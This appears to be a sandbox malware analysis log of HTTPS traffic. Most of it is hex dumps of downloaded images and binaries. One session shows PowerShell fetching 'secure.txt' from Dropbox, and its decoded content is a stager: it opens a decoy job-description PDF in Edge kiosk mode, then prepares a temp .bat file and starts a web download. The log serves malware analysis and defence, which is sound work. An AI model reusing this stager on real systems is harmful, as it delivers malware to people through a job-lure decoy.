                                                                                                                                                                                                                                                                  2024-12-19 12:44:19 UTC16384INData Raw: 96 34 ab b6 e9 11 fe 0a 19 e0 8f fb 94 cf b5 5b fd d5 7a 2c 8c e4 e5 2d 93 2d fc ab 4f 8c d5 38 a4 56 7a b5 09 a6 63 38 d9 13 e6 9b bd 68 61 4d 54 cd 0c cb 41 97 16 71 dd 26 d6 ac 6d 5b 4a fb 3f cd 1f dd ae 85 78 ac fd 70 4f 2c 2c b1 f9 6b 44 a2 ac 6b 46 a4 d4 d2 be 87 2a c9 fd e9 2a 36 8a 2a 92 6b 19 23 7f de 49 1e ea 19 36 7d e9 2b 13 d1 22 f2 e2 5f 99 a9 16 58 97 ee c7 55 66 bb 89 24 f9 be 6a 16 ff 00 7f cb 0c 1b a8 26 f6 2e 7d a6 7f 2f 6c 3f 2d 3e df 45 96 f2 44 93 50 9f e5 fe e6 fa cc b8 b9 95 3f d6 49 b6 99 0d ea b4 9f eb 28 e5 0e 73 ab 8f 4e d3 21 4f 96 08 2a 5f 32 ce d6 3d cd 22 2a d7 35 0d c6 ef f9 69 f2 d3 9a 4b 6f bd 24 9b aa 76 0b 5d 6e 5f d4 bc 66 b6 f2 79 3a 7d 8f 9f fe db 7c ab 52 e9 be 21 d5 6e fe 69 a0 8e 25 ac 16 bc b6 59 36 c3 1d 5c d3
                                                                                                                                                                                                                                                                  Data Ascii: 4[z,--O8Vzc8haMTAq&m[J?xpO,,kDkF**6*k#I6}+"_XUf$j&.}/l?->EDP?I(sN!O*_2="*5iKo$v]n_fy:}|R!ni%Y6\
                                                                                                                                                                                                                                                                  2024-12-19 12:44:19 UTC16384INData Raw: ab b0 fe 11 b3 f9 f4 ab f6 35 bf 94 8f 6b 4f b9 ec 0a 1a b8 7f da 23 e2 4d b7 c2 df 05 c3 aa 49 04 17 1a 95 fb b4 5a 75 bc df ea b8 fb f2 49 8f e1 5e c3 f8 9a b1 ed 7f 69 9f 83 fe 42 49 71 7f a9 45 36 c9 1a 6b 4f b2 ee 68 76 7f 79 81 c7 cf da be 47 f8 c5 f1 17 5a f8 9b e3 0b bd 7b 54 9f 6d ae f6 fe ce b7 77 f9 6d a1 dd f2 aa af 41 5d d8 0c be 75 a7 79 ab 24 72 e2 f1 90 a7 0f 75 ea 6e 78 eb f6 81 f8 89 e2 89 de d6 f3 5d 9e d7 4f 97 ef da 69 c9 f6 55 7f f7 b6 73 b7 ea 6b ce 75 6f 18 da 59 40 91 f9 8e d2 4b bb ee 27 f3 ae 77 5c d4 20 fb 77 d9 ed ff 00 7b 1e fd af b1 ff 00 d7 7a e4 d6 0d f5 b3 2c 7f e8 fe 5e d6 7f b9 bf ee 57 b5 2a 2a 09 c2 11 49 1e 64 6b 5d a9 b7 a9 ea 7f 09 fe 3a 78 97 c1 fe 20 49 bc 37 77 3d 9a cb b7 ce 85 fe 68 ae 71 ff 00 3d 13 a3 57 b7
                                                                                                                                                                                                                                                                  Data Ascii: 5kO#MIZuI^iBIqE6kOhvyGZ{TmwmA]uy$runx]OiUskuoY@K'w\ w{z,^W**Idk]:x I7w=hq=W
                                                                                                                                                                                                                                                                  2024-12-19 12:44:19 UTC16384INData Raw: c5 c3 77 7f 78 7f 6b 62 3b 23 e8 af f8 5d 3e 02 ff 00 9e 9a c7 fe 0b bf fb 2a 5f f8 5d 7e 02 ff 00 9e 9a c7 fe 0b bf fb 2a f9 d9 67 db ff 00 2c e3 ff 00 c7 a8 f3 77 7f cb 08 ff 00 f1 ea 3f b1 70 fd df de 1f da d8 8f 2f b8 fa 2f fe 17 67 80 3f e7 be b1 ff 00 82 ef fe ca 8f f8 5d df 0f bf e7 be b3 ff 00 82 ef fe ca be 74 f3 17 fe 78 47 4d de ad ff 00 2c e3 a9 fe c5 c3 77 7f 78 7f 6b e2 3c be e3 e8 e5 f8 df e0 0f f9 e9 ac 7f e0 af ff 00 b2 a7 2f c6 ff 00 87 df f3 df 58 ff 00 c1 77 ff 00 65 5f 37 e5 3f e7 9c 74 ac 7f bb ff 00 a0 51 fd 8b 86 ee fe f1 ff 00 6b e2 3b 2f b8 fa 3f fe 17 8f c3 ef ef eb 3f f8 2e ff 00 ec a9 df f0 bc be 1f 7f cf 4d 63 ff 00 05 df fd 95 7c df b7 f8 b6 7f e3 94 2e df f9 e7 ff 00 8e 51 fd 87 86 ee fe f0 fe d8 af d9 7d c7 d2 1f f0 bd 3e
                                                                                                                                                                                                                                                                  Data Ascii: wxkb;#]>*_]~*g,w?p//g?]txGM,wxk</Xwe_7?tQk;/??.Mc|.Q}>
                                                                                                                                                                                                                                                                  2024-12-19 12:44:19 UTC16384INData Raw: 56 bd 8f 4a 6b 39 7c bd ad 77 27 fe 3d 4e b5 82 26 f9 5a 79 1d ab c8 6d 3e 3b 78 6a 67 da b6 fa b5 fa fc bf 25 dd d4 71 2a 7f df 00 fe b5 62 fb f6 85 8a cb 52 55 5d 0a fa de d5 bf e5 e2 29 d6 e7 e5 f5 fb b8 fd 69 f3 43 b9 37 7d 8f 58 9a 4d 2a df fd 76 a5 04 4c bf 2f ef a7 5a 9e 19 74 86 9f cb fe d6 b1 56 ff 00 ae eb 5e 48 df 1e 74 39 ed 61 ba 58 fc 41 75 75 2b fc f6 3f 65 b5 81 76 f6 db 36 0e 5b f0 ac af 11 7c 79 b9 de f6 7a 7f 83 2e 97 e4 ff 00 98 8d d2 cb b1 bf dd d8 b4 b9 a0 ba 95 ef 76 3d e5 65 d2 a2 93 cb 93 5a b1 56 6f fa 6e ad 56 61 bb d0 da 7f 27 fb 77 4d 59 3f b9 be be 7b f0 df 8e fc 5f e2 1b a7 6b ad 4b c2 3e 17 58 91 59 3e d0 93 45 14 cb fd d5 fb 3e ef cc d7 47 ab 78 86 f9 f4 37 8d bc 7d e0 08 bf 72 cd 12 5a 4f a9 5e 33 c9 d8 0f 94 0f cf 8a cd
                                                                                                                                                                                                                                                                  Data Ascii: VJk9|w'=N&Zym>;xjg%q*bRU])iC7}XM*vL/ZtV^Ht9aXAuu+?ev6[|yz.v=eZVonVa'wMY?{_kK>XY>E>Gx7}rZO^3
                                                                                                                                                                                                                                                                  2024-12-19 12:44:19 UTC16067INData Raw: e9 57 4b 83 fe 9a 6e fe e5 5a be bc 89 23 ff 00 57 22 c8 bf 2b d5 18 ef 5b cc ff 00 59 3d 43 8a 4c 14 a5 71 d1 e9 ff 00 c2 c9 f7 be 64 a3 fb 2d 47 de 49 16 97 ed 8a 90 3e ef f5 94 fb 19 a5 b9 9f 6c 70 4f 74 df c6 88 8c df a2 d2 e5 8b ea 2e 66 43 75 a5 4a 89 f2 bc 1f f7 dd 43 0e 9b 72 f2 32 f9 12 7c b5 b1 26 9d ad 5c 27 99 6b a4 ea 31 42 bf 7f 64 32 6d e7 f0 ad 5f 0e f8 5f c5 d7 7b 37 69 37 4b 6e af b5 de e1 3c 85 4f f8 11 e7 14 72 c5 2d 5e 82 95 44 93 d4 e3 ae 34 fb 98 be f4 32 53 52 ca f1 fe 65 b6 93 6b 7f b1 5e c1 71 e0 2b e4 92 19 23 bb b1 66 d9 f3 a3 bf ca 8d df fd ff 00 d2 99 27 82 b7 c9 fb cf 12 da db b2 ed de 9f dc ff 00 75 73 59 ba d8 54 ed ed 57 de 63 1c 52 b5 e5 fa ff 00 91 e4 ab a5 6a 0d f7 6d 24 a6 4d 63 77 17 fa cb 79 16 bd 5e 6f 09 c0 92 3a
                                                                                                                                                                                                                                                                  Data Ascii: WKnZ#W"+[Y=CLqd-GI>lpOt.fCuJCr2|&\'k1Bd2m__{7i7Kn<Or-^D42SRek^q+#f'usYTWcRjm$Mcwy^o:
                                                                                                                                                                                                                                                                  2024-12-19 12:44:19 UTC16384INData Raw: 52 5e 8f 5f c0 e9 8e 25 c9 2b c2 df d7 a9 7a dd 7c 3f fd 9b e6 5c 6a d2 34 31 26 e8 5f f7 71 46 9e 89 d7 e4 6d de b5 8b ab 6a 7e 0f 79 3c c5 d6 51 bc ad bb d2 de ea 36 f5 1f 75 14 d6 c6 b7 a2 7c 3e f0 f6 97 71 e6 d8 f9 f1 ec 5f dd 4b 3c 97 2c f9 6f 93 f8 b6 ae 57 d7 f3 ac bd 36 f7 c2 e7 c3 ff 00 65 d2 74 9d 0f 49 5b 8f 9a df ed da 72 ac bf 23 7c e8 ce 07 fe 3f 5c 9f 52 84 67 6b c9 bb f4 db fa f4 2e 55 53 8d ec 8c 6b 8f 16 7c 3c bf 8e e1 6f bc f6 8e d7 6c 69 e4 a4 9b 5d 47 2a c8 ca 98 0c 3b 56 ad af 8a 7c 0a 2c 62 8f 47 f0 be a5 7f 22 ed 6f df 25 d4 ac 8b e9 f2 0f 9b f3 c5 74 f6 3e 2a b9 b5 b5 b8 8e 48 ed 6c 2d e5 4f f4 77 4b 5d ad 36 7a 1d ed d7 1d 88 07 3e 95 8f fd b5 7a f6 f3 6a 5f da 57 ca aa ea a8 f6 f7 4d 03 3e 5b 1f 3a 36 47 3e ab f9 54 aa d4 62 b9
                                                                                                                                                                                                                                                                  Data Ascii: R^_%+z|?\j41&_qFmj~y<Q6u|>q_K<,oW6etI[r#|?\Rgk.USk|<oli]G*;V|,bG"o%t>*Hl-OwK]6z>zj_WM>[:6G>Tb
                                                                                                                                                                                                                                                                  2024-12-19 12:44:19 UTC16384INData Raw: ec 7e d3 e1 cf 19 26 a5 74 bf 2f 95 a9 c0 ab bd 47 dd f9 94 9f 98 74 f9 ab cc 7c 4d a1 f8 8f c0 5a a4 2b e2 7f 0d be 9c ca fb 52 ed 11 7c a7 f7 59 80 61 ff 00 01 24 57 76 bf 17 bc 60 d1 cd 0f fc 24 8e d3 2b f9 48 e9 1b 2a bb 1e 41 5d d1 ff 00 ec bf 8d 63 f8 c3 e2 16 bb ae c3 6e fa a5 bb ea 91 c6 ec cb 15 df 9d e4 23 6d c6 ed aa 3f 22 47 15 e7 e3 71 19 4d 7a 6d d3 a1 28 cb a5 ac 97 e6 cb 8c 67 1d 53 fd 4e 72 df 59 fb 55 8b cd 6f 25 af 99 fc 69 bd 97 e9 c2 9f 9b fa 54 d0 d9 d8 ca ff 00 6a b7 83 6b 2e d6 95 ff 00 85 db 6f e7 bb de 8d 17 5e 4b 8d 3b ce bb f0 f5 ac 13 33 b2 a7 d9 13 ca 57 6e 83 ef 1c e0 f6 cf e3 b6 b4 ec fc 71 2c f3 dc 69 b3 68 be 53 2a 2e c4 f2 21 8b ce c7 f0 8f bc 5b f9 57 cc fb 16 dc 96 d6 f9 9b a9 43 4b 8c b7 b5 96 74 78 63 f3 15 ae b7 2a
                                                                                                                                                                                                                                                                  Data Ascii: ~&t/Gt|MZ+R|Ya$Wv`$+H*A]cn#m?"GqMzm(gSNrYUo%iTjk.o^K;3Wnq,ihS*.![WCKtxc*


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  7192.168.2.649736162.125.69.154436972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:18 UTC370OUTGET /cd/0/get/CgjThj9J4LYCxQ4m9781PB-i6DM8ie3o4ofLacmyEI5Ia-6dN3jN8vAwCUwbkPn36hUDAPHCB6NX0PsiCU-83zLbN8fqw1lkGaB-t9uzckUV7WQRvn5oGJz76GOJyZNHh8YQtnlHacLXQI3-Sa9mMX8K/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                  Host: ucf22feba25dd3a3196337a0818f.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:19 UTC734INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Cache-Control: max-age=60
                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="secure.txt"; filename*=UTF-8''secure.txt
                                                                                                                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                  Etag: 1734593174806299d
                                                                                                                                                                                                                                                                  Pragma: public
                                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                  X-Server-Response-Time: 142
                                                                                                                                                                                                                                                                  X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:19 GMT
                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                  Content-Length: 453
                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 417aaa0a6b564e2db2732147d09bd86a
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:19 UTC453INData Raw: 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 6d 73 65 64 67 65 2e 65 78 65 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2d 2d 6b 69 6f 73 6b 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 7a 6c 76 35 32 38 38 70 69 64 31 36 70 77 33 69 31 35 72 64 78 2f 44 6f 63 75 6d 65 6e 74 73 2d 61 62 6f 75 74 2d 63 6f 6d 70 61 6e 79 2d 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 61 6e 64 2d 6a 6f 62 2d 64 65 73 63 72 69 70 74 69 6f 6e 73 2d 34 2e 70 64 66 3f 72 6c 6b 65 79 3d 65 39 79 66 71 6c 66 35 33 73 6d 62 30 70 39 34 6c 66 67 33 74 72 72 6b 78 26 64 6c 3d 31 22 3b 20 24 52 61 6e 64 6f 6d 46 69 6c 65 4e 61 6d 65 20 3d 20 22 24 65 6e 76 3a 74 65 6d 70 5c 24 28 47 65 74 2d 52 61 6e 64 6f 6d 29 2e 62 61 74 22 3b 20 49 57 52
                                                                                                                                                                                                                                                                  Data Ascii: Start-Process msedge.exe -ArgumentList "--kiosk https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1"; $RandomFileName = "$env:temp\$(Get-Random).bat"; IWR


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  8192.168.2.649737150.171.27.10443
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:19 UTC346OUTGET /th?id=OADD2.10239340418568_12QU0TF0Q0S6KJNUT&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                  Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:19 UTC856INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                  Content-Length: 581717
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                  NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                  X-MSEdge-Ref: Ref A: 4AB7264B4C3C44CE8B78242D5613B8BC Ref B: EWR311000108049 Ref C: 2024-12-19T12:44:19Z
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:19 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:19 UTC15528INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 32 3a 31 30 20 32 33 3a 35 33 3a 34 32 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 04 38 00 00 a0 03 00 03 00 00 00 01 07 80 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03
                                                                                                                                                                                                                                                                  Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.1 (Windows)2023:02:10 23:53:428C
                                                                                                                                                                                                                                                                  2024-12-19 12:44:20 UTC16384INData Raw: cf b3 ff 00 7b ef 2d 57 31 0d 26 72 97 96 0d 04 95 51 95 93 e5 ae da 4b 6d fb f7 56 4d f6 8f b7 7b 47 5a 2a 84 38 1c e4 91 ed f9 bf 8a 9f 1a b2 fd ef 9a ad 5c 59 cb 04 9f 2d 40 a3 77 dd fe 1a b4 ee 67 ca 49 0e d7 ff 00 66 ac c2 9f de fe 2a a6 a3 f8 5a ad 43 2b 7f 17 f0 d3 1a 2d db a7 f0 af de a9 5a df 75 36 33 b7 ee d5 cb 76 47 d9 51 72 ac 55 92 df 77 de aa b7 16 9b 7e ef ca b5 b4 d6 f5 14 d0 2f fd f5 45 c5 ca 61 34 79 a3 63 2f fc 02 b4 a6 b4 fd e7 fb 3f c1 55 e4 89 fc cf ef 53 52 44 b4 56 5f 97 e5 a7 28 a7 48 89 f7 bf 79 fe c5 22 ff 00 75 a9 dc 56 17 34 e5 a1 7f d9 a5 5f ee d2 0b 08 a3 6f dd a8 6e 1a ac 67 6d 45 30 5f e2 fb ad 40 8a 7f 73 ef 54 6c 73 52 4c 9f bc db 55 a4 dc 24 db 54 43 12 4f f6 be 5a 86 4a 9b 35 14 82 a8 96 45 fe ef de a9 57 fd 9f bd 49
                                                                                                                                                                                                                                                                  Data Ascii: {-W1&rQKmVM{GZ*8\Y-@wgIf*ZC+-Zu63vGQrUw~/Ea4yc/?USRDV_(Hy"uV4_ongmE0_@sTlsRLU$TCOZJ5EWI
                                                                                                                                                                                                                                                                  2024-12-19 12:44:20 UTC16384INData Raw: 68 bf 7f b5 6b 5e 14 69 23 a2 1d 3f 74 9f 35 67 cd 62 9c 1b 65 ef 0f c5 fb b4 55 8e ba 28 6d f6 c7 f3 55 6d 1e cd 60 8d 3f 77 57 e6 7d b5 cf 27 76 74 45 59 11 dd 0d b1 d6 2d e3 d6 c5 c3 fe ef 75 64 5d 7c d5 93 34 33 6e 83 3c 95 1c 70 6e ab ad 1a d5 7b a9 b6 fe ed 69 14 55 98 ec 92 b3 3c 45 7d b6 3d ab 57 6e 11 9b e6 6f bb 58 ba b2 79 b2 3b 7f 0d 5a 24 c1 bc 92 59 64 a6 c7 03 34 9b 5a ad 48 9b 3e ec 75 7b 4f b4 ff 00 96 92 56 88 ca c4 36 f0 32 47 55 2f 0e e9 2b 47 52 b8 82 28 fe 5f bd 5c f5 e5 cb 3c 8f b7 ee d4 b2 d2 20 bc 91 57 e5 aa 92 33 ff 00 15 4d 22 6e f9 aa 29 85 4d ca 21 91 f1 4d df ba 4d ab 44 82 a4 b5 83 32 52 01 f6 e8 cd 5a 96 30 7f 7a 92 ce d7 fb d5 a7 6b 6f b6 a4 a2 4b 18 95 7e f5 15 66 18 e8 a5 72 8e 3f 58 8e 78 b7 f9 7f f8 e5 73 f7 57 ad 04
                                                                                                                                                                                                                                                                  Data Ascii: hk^i#?t5gbeU(mUm`?wW}'vtEY-ud]|43n<pn{iU<E}=WnoXy;Z$Yd4ZH>u{OV62GU/+GR(_\< W3M"n)M!MMD2RZ0zkoK~fr?XxsW
                                                                                                                                                                                                                                                                  2024-12-19 12:44:20 UTC16384INData Raw: d1 d0 b1 54 dc a2 3a 4c 54 fe 5d 3b cb a2 e0 56 c5 3b 66 ea b3 e5 d1 b2 97 30 15 bc 9a 2a d7 97 45 2b 8e c7 97 6d f6 a7 6c a7 32 52 e2 be 9c f9 c4 88 f1 46 29 f8 fe f5 3b 6f b5 03 b1 1e ca 55 14 f5 14 ea 02 c4 58 db f3 53 98 7f 76 97 6f b5 2e 29 5c 2c 37 14 62 a4 d9 46 28 b8 58 66 df 6a 3f dd a7 e2 9d 8a 2e 3e 52 2d b4 6d a9 71 46 28 b8 72 8c d9 49 8a 93 1b 69 14 52 e6 1d 86 62 97 1f c3 52 6d f6 a3 6f b5 2b 85 86 62 9b 8a 97 6f b5 1b 7d a8 b8 58 8e 97 15 2e ca 36 51 71 f2 91 d1 87 a9 31 fd ea 5d 95 37 1d 86 6d 6a 72 8d b5 22 d3 b3 45 c6 44 a2 a6 8d 3f 86 85 31 37 de a9 17 c8 fe 2a 86 c0 6f 97 fe c5 35 ad da a7 d9 07 f0 cf 4f ce df bb 25 4f 31 a2 89 52 4b 67 ff 00 9e 75 1f 90 cb 5a 0b 25 3d 64 5a 5c cd 07 2a 33 97 72 d2 ef 65 ff 00 81 56 83 15 3f f3 ce 99
                                                                                                                                                                                                                                                                  Data Ascii: T:LT];V;f0*E+ml2RF);oUXSvo.)\,7bF(Xfj?.>R-mqF(rIiRbRmo+bo}X.6Qq1]7mjr"ED?17*o5O%O1RKguZ%=dZ\*3reV?
                                                                                                                                                                                                                                                                  2024-12-19 12:44:20 UTC16384INData Raw: 90 f9 3f 2b 2d 76 1e 30 b8 66 f0 8d dc ca 91 ab 6f 8d 9e 64 dd b7 73 2d 71 ba 5e 95 2e b7 e3 0b 4d 37 47 f9 a4 b8 75 5f 93 ee d7 61 e3 ab 2f 2b 4a b7 d3 56 39 22 86 27 dc fb df fd 76 ce 38 ad ac f9 5b 33 bc 79 d4 2f a9 26 82 91 69 da 6f d9 6e a0 81 a6 8a de 36 4d 9b b7 26 6a 8e a1 a8 5f 3d f7 fa f9 3c c5 ff 00 c7 3d 31 57 3c 65 a8 fd 9e 4f 27 c8 8f 6c b6 f1 ab dc bb fc c9 85 fb a2 b1 7c cd b6 2f 71 24 7b a4 fe 0a b9 36 a3 ca 99 8c 55 e7 ce d6 a4 73 5c 2c af ba e2 79 1b fd fa 86 4b 88 16 37 65 f3 3f 75 4d 86 df cf f9 9a 4f 97 f8 ff 00 86 9d e5 2a f9 d1 c7 3e ff 00 93 76 f4 a1 45 8e 52 8a d4 65 8d c3 4f 71 13 6c 91 55 7e 64 4a 93 56 31 79 7f bb f3 36 ff 00 1e fa 2c 64 65 93 cc 8e d2 45 ff 00 6d ea 6b e9 60 97 7c 31 ff 00 c0 de b9 e4 ee ce 98 ab 22 94 71 4e
                                                                                                                                                                                                                                                                  Data Ascii: ?+-v0fods-q^.M7Gu_a/+JV9"'v8[3y/&ion6M&j_=<=1W<eO'l|/q${6Us\,yK7e?uMO*>vEReOqlU~dJV1y6,deEmk`|1"qN
                                                                                                                                                                                                                                                                  2024-12-19 12:44:20 UTC16384INData Raw: 16 d7 f7 de 76 ad e2 1f de 36 dd ff 00 b8 93 e4 c7 66 e3 e6 ab 2d 6a b2 c1 fd ad 71 ab 5a ca bb 17 ec e9 e5 fc af 9f 45 fe 11 42 82 96 a9 96 ea 72 f4 3c aa ce c3 c4 37 10 45 0d bc 73 b6 cf 97 63 ff 00 2a 9a df 40 f1 63 c8 f6 bf 60 dd bb ee 6f db 5e 89 6b 73 a1 fc 97 12 6b d6 31 6d 76 f3 b6 27 ef 7f da db 9a cc f1 06 9d e1 ab ad 51 2f 21 f1 2f fa 3a a7 fc bb bf ef 7f 2f ef 54 4a 29 3b 07 b5 e6 39 6b 9f 0d f8 dd 7f 79 71 b1 96 df fe 5a a4 ff 00 2a 7e 55 76 3f 0a 78 9a eb 47 95 a6 bb d3 ad ff 00 db f3 fe 6a ea f4 78 bc 2b 75 7d f6 7b 7d 6b 55 b8 dd 0e e7 7d 8d f2 35 4d 63 e1 74 b5 9e 69 ac 7c fb c5 67 f9 f7 c9 b7 66 69 24 87 cf 73 87 b5 f0 c7 88 ef 7c 95 fe d6 92 f2 dd be 6f dc ff 00 b3 e9 56 ef 34 0b 98 23 7f 32 ef ec ea bf f2 c6 e1 fe e7 d7 fd aa ee d6 c2
                                                                                                                                                                                                                                                                  Data Ascii: v6f-jqZEBr<7Esc*@c`o^ksk1mv'Q/!/:/TJ);9kyqZ*~Uv?xGjx+u}{}kU}5Mcti|gfi$s|oV4#2
                                                                                                                                                                                                                                                                  2024-12-19 12:44:20 UTC16384INData Raw: 17 c3 1e eb cf 0f 4f 2c 9f c6 ef 06 ef e5 51 58 6b 92 7d ab fe 26 9a 35 d2 b6 df 9d a1 46 5d 9f 85 74 43 13 45 eb 19 5c 52 8c b6 b1 d0 ff 00 69 f9 5b 5a 4b b9 22 b8 ff 00 61 3e 5a 72 eb 17 cf 26 e8 64 fb 44 2b f2 bf 9d f7 5e b3 6d 6e 2c 6f 3f 79 6f 1c 8c b1 7c ce fe 5e e9 76 ff 00 8d 36 e3 c5 6b 6b fb 9b 7d 0b e6 fe fc c8 cc d5 b7 3a ee 63 ca dc 9a 48 da d3 ed ed b5 19 dd 9a d2 0b 79 bf db dd b7 fc 29 75 2d 29 57 7f ef 3f d5 7d c4 85 d5 96 b9 c6 f1 33 ea 17 48 93 41 35 ba aa 7c fe 54 2d f2 7b 9a bb 1e a7 05 c5 af 93 6f 3f da be 7f be e8 db 68 8d 48 31 f2 49 44 58 ec 2e 6e b7 f9 3f ba db fc 6e fb 99 3f 0a 9f 4d f0 f5 9c 11 fe f9 e3 b8 66 f9 be fd 1a 94 17 8d 75 e7 49 24 8b 6b b3 6a 27 96 db 91 be b8 a8 6d e2 68 f6 4d 6b 76 9b b7 fc e9 f7 7f 3a 34 7b 15 cd
                                                                                                                                                                                                                                                                  Data Ascii: O,QXk}&5F]tCE\Ri[ZK"a>Zr&dD+^mn,o?yo|^v6kk}:cHy)u-)W?}3HA5|T-{o?hH1IDX.n?n?MfuI$kj'mhMkv:4{
                                                                                                                                                                                                                                                                  2024-12-19 12:44:20 UTC16069INData Raw: 6d a2 d0 d8 b5 d3 74 cb a9 de ce d6 74 b7 93 67 ce f0 ed f9 d7 fd ea dd f0 bf 8b 7c 47 e1 98 11 61 bf 8d ad ed 7e e5 a3 c0 be 6e d6 e9 bb 6f de fa d7 1d 75 a4 e8 cb 23 ae c9 de 45 46 d8 f6 f3 fc bb ab 43 4d b6 d0 e0 8d 6e a6 bf 9d 6e 2d d1 5b 7a 6e 6f fc 7b fb b5 14 b1 d8 ba 3e f5 39 b2 fd c7 ba 3b 4b cf 8b 97 29 bf f7 9a 1b 5c 3b af c9 73 6b b5 53 77 ba 8a d4 b7 f8 a5 ad 59 c8 9f b8 d3 6d fc ad bb e1 87 76 dd c6 bc d2 6d 3b 43 59 3e d1 36 b5 6b 2d 9b cd fb a8 7e ca cd b3 3f ed 55 f8 f4 1b 9b 7d f7 56 37 d1 dc 42 cf b5 21 fb cb 32 ff 00 b7 fd d2 b5 d1 3c fb 31 56 fd eb fc 09 50 d6 c7 5b ac 7c 40 d6 9e 39 af 24 be 93 4b f2 9f cd 7f 25 da 55 75 fe e7 15 5b 4d f8 ab 7d 71 1b dc 5c 78 96 7b 58 57 ee 6f b5 56 6e 7f ba 6b 1e 4b 6d 56 da d7 ed 51 cf 63 2d ae cf
                                                                                                                                                                                                                                                                  Data Ascii: mttg|Ga~nou#EFCMnn-[zno{>9;K)\;skSwYmvm;CY>6k-~?U}V7B!2<1VP[|@9$K%Uu[M}q\x{XWoVnkKmVQc-
